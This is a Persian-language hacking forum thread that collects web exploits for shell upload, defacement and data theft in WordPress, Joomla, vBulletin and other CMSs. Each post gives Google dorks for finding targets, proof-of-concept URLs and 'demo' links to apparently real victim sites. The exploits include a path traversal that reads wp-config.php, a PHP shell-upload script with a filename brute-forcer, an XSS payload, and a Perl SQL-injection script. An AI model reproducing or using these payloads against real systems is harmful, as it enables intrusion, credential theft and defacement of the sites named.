پست های پیشنهاد شده

درود بر تمامی عزیزان گارد ایران.

در این تاپیک اکسپلویت های مختلف قرار میگیرند.

اکسپلویت هایی از قبیل آپلود شل و دیفیس در CMS های مختلف.

 

قوانین تاپیک:

1-اسپم ممنوع

2-طرح سوال در بخش مربوطه.

3-چیزی به جز اکسپلویت در این تاپیک قرار نخواهد گرفت.

موفق باشید.

############################################################################################

Wordpress Plugin Slider Revolution 4.1.4

سلام

از طریق باگ پلاگین Slider Revolution می توان فایل config.php را دانلود و اطلاعات DataBase را مشاهده کرد.

DORK:

revslider.php "index of"

POC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

DEMO

www.redkatana.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.gaeliccollege.edu/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

 Joomla Aclsfgpl Shell Upload


[+] Author: TUNISIAN CYBER

[+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability

[+] Date: 07-01-2014

[+] Category: WebApp

[+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form

[+] Tested on: KaliLinux

[+} Friend's blog: www.na3il.com

########################################################################################

+Exploit:

You can upload file (.php/.php.jpg...)

+P.O.C:

127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form

Shell path:

copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/

Demo:

http://www.club-plongee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form

http://www.triclubsandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form

http://aero.decines.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form

./3nD

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Joomla VideoShare Shell Upload


-----------------------------------------------------------------------------------------------------------------------------------------

Google Dork : inurl:/components/com_hwdvideoshare

Exploit : depends fonction date() Same country, it's ideal.Attention at the time on the target and on the pc which attack.

-----------------------------------------------------------------------------------------------------------------------------------------

PostShell.php <?php $uploadfile="lo.php.vob"; $ch = curl_init("http://www.exemple.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; echo "<br />"; $i = 0; for ($i=1;$i<9999;$i++) { $n = 4; $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT); $filename = date('YmdH').$num.$uploadfile; $url = "http://www.exemple.com/tmp/".$filename; $c = curl_init("$url"); $postResult2 = curl_exec($c); $info = curl_getinfo($c); $httpcode = $info['http_code]; if($httpcode == 200){ echo $url; curl_close($c); exit; }

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

vBulletin YUI 2.9.0 Cross Site Scripting


[+] Author: TUNISIAN CYBER

[+] Exploit Title: vBulletin YUI 2.9.0 Cross Site Scripting vulnerability

[+] Date: 09-01-2014

[+] Category: WebApp

[+] Google Dork: :inurl:"clientscript/yui/uploader/assets/"

[+] Tested on: KaliLinux

[+} Friend's blog: www.na3il.com

########################################################################################

+Description:

YUI is a free, open source JavaScript and CSS library for building richly interactive web applications.

Used by vBulletin.

+Exploit:

YUI suffers from an xss vulnerability.

+P.O.C:

127.0.0.1/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain="})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

Demo:

http://fansfoot.com/forum/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

http://www.liveworkshop.com/forums/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

http://www.mjjcommunity.com/forum/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

http://www.wivesbehindthebadge.org/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

Patch:

Upgarde to 3.X Version.

./3nD

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

 vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection


#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Cookies;

use HTTP::Request::Common;

use MIME::Base64;

system $^O eq 'MSWin32' ? 'cls' : 'clear';

print "

+===================================================+

| vBulletin 5 Beta XX SQLi 0day |

| Author: Orestis Kourides |

| Web Site: http://www.cyitsec.net |

+===================================================+

";

if (@ARGV != 5) {

print "\r\nUsage: perl vb5exp.pl http://WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";

exit;

}

$host = $ARGV[0];

$path = $ARGV[1];

$username = $ARGV[2];

$password = $ARGV[3];

$magicnum = $ARGV[4];

$encpath = encode_base64('http://'.$host.$path);

print "[+] Logging\n";

print "[+] Username: ".$username."\n";

print "[+] Password: ".$password."\n";

print "[+] MagicNum: ".$magicnum."\n";

print "[+] " .$host.$path."auth/login\n";

my $browser = LWP::UserAgent->new;

my $cookie_jar = HTTP::Cookies->new;

my $response = $browser->post( 'http://'.$host.$path.'auth/login',

[

'url' => $encpath,

'username' => $username,

'password' => $password,

],

Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',

User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',

);

$browser->cookie_jar( $cookie_jar );

my $browser = LWP::UserAgent->new;

$browser->cookie_jar( $cookie_jar );

print "[+] Requesting\n";

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',

[

'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',

],

User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',

);

$data = $response->content;

if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };

print "\n";

exit 1;

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Web eXperts Shell Upload / SQL Injection


[+] Author: TUNISIAN CYBER

[+] Exploit Title: Web eXperts FileUpload/SQLi vulnerabilities

[+] Date: 14-01-2014

[+] Category: WebApp

[+] Google Dork: :intext:"Website Design & Developed By Web eXperts"

[+] Tested on: KaliLinux

[+} Friend's blog: www.na3il.com

########################################################################################

+Exploit:

Web eXperts suffers from a File Upload/SQLi vulnerabilities

1/File Upload:

+P.O.C:

127.0.0.1/[PATH]/addons/imagelibrary/insert_image.php?wysiwyg=

Shell path:

site.ltd/uploads/h4x3d.php.jpg

2/SQli:

127.0.0.1/products.php?category_id=sql

Demo:

http://www.strivesports.com//products.php?category_id=1'

http://www.hangal.com.pk/addons/imagelibrary/insert_image.php?wysiwyg=

http://www.strivesports.com/addons/imagelibrary/insert_image.php?wysiwyg=

http://www.sarsonss.com/products.php?category_id=1'

http://www.sirgeeintl.com/products.php?category_id=1'

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر


#######################################################

# [+] Title : Turkish Radyo CMS Sql Injection

# [+] Date : 07/11/2015

# [+] Tested on : Kali Linux - Windows 7

# [+] Category : webapps

# [+] Platforms: php

# [+] Google Dorks : inurl: haberoku.php?id=

# [+] Admin page : www.site.com/admin/

# [+] Exploit Author : M4ni4c

# [+] Team name : Azerbaijan Cyber Army

# [+] The Official Members : KRONiQS , NiKO , RiKO , M4ni4c , DADO , D4RT0N , Jason

# [+] Contact : fb.com/M4ni4c , fb.com/azecyberarmy , m4ni4c@box.az

# [+]Demo Sites:

# http://www.mizikXafm.com/haberoku.php?id=30

# http://www.kayXradyo.com/haberoku.php?id=43

# http://www.yilXdizfm.net/haberoku.php?id=207

#######################################################

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از ۷۵ اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به عنوان یک لینک به جای

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

در حال بارگذاری